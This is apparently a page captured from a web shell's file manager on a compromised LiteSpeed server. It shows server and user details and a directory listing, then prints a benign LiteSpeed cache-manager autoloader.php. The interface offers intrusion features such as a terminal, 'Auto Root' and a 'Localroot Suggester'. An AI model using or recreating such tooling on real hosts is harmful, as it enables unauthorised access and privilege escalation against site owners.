Linux srv25.usacloudserver.us 5.14.0-570.39.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Sep 4 05:08:52 EDT 2025 x86_64
LiteSpeed
Server IP : 23.137.84.82 & Your IP : 216.73.216.127
Domains :
Cant Read [ /etc/named.conf ]
User : epicgamerzoneco
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
local /
lsws /
add-ons /
webcachemgr /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxrwxr-x
2025-07-17 01:29
MIN_VER
7
B
-rw-r--r--
2025-08-26 18:04
VERSION
8
B
-rw-rw-r--
2025-07-17 01:29
autoloader.php
885
B
-rw-rw-r--
2025-07-17 01:29
bootstrap.php
513
B
-rw-rw-r--
2025-07-17 01:29
bootstrap_cli.php
531
B
-rw-rw-r--
2025-07-17 01:29
Save
Rename
<?php /* * ********************************************* * LiteSpeed Web Server Cache Manager * @Author: LiteSpeed Technologies, Inc. (https://www.litespeedtech.com) * @Copyright: (c) 2018 * ******************************************* */ spl_autoload_register(function($class) { /** * project-specific namespace prefix */ $prefix = 'Lsc\\Wp\\'; /** * base directory for the namespace prefix */ $base_dir = __DIR__ . '/src/'; $len = strlen($prefix); if ( strncmp($prefix, $class, $len) !== 0 ) { /** * Class use the namespace prefix, * move to the next registered autoloader. */ return; } $relative_class_name = substr($class, $len); $file = $base_dir . str_replace('\\', '/', $relative_class_name) . '.php'; if ( file_exists($file) ) { require $file; } });